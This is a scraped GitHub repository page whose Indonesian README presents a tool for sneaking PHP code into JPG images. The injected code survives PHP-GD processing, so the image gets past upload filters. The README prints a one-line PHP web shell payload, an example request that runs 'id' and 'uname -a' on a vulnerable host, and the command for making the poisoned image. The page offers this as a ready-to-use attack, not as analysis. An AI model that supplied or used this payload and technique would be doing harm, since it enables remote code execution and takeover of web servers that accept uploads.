Skip to content

adialamsyahardi/Bypass-image-upload-with-PHP-GD

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
README.md
README.md
 
 
gd.php
gd.php
 
 
readme.txt
readme.txt
 
 
sample.jpg
sample.jpg
 
 

Repository files navigation

Bypass PHP-GD RCE

Bypassing image uploader use PHP-GD

Bypassing Via Injecting RCE Code In Image

Perbedaan injeksi PHP GD dengan injeksi seperti exiftool, dan jhead adalah tidak merusak pixel/merubah pixel gambar.
gambar yang di injeksi akan tetap menampilkan gambar, terdeteksi, dan terlihat seperti gambar asli

Ubah gd.php dan ganti Payload/Kode yang ingin di inject ke gambar di LINE 8

$miniPayload = 'taruh payloadmu disini';

contoh payload yang dipake :

$miniPayload = '<?=`$_GET[0]`?>';
as
vuln.com/rce.jpg.php?0=id;uname -a

How ?

php gd.php sample.jpg

jika sukses, maka ada file baru bernama payload_sample.jpg

JPG ONLY !!!

About

Bypass-image-upload-with-PHP-GD

Topics

php hacking bypassing

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages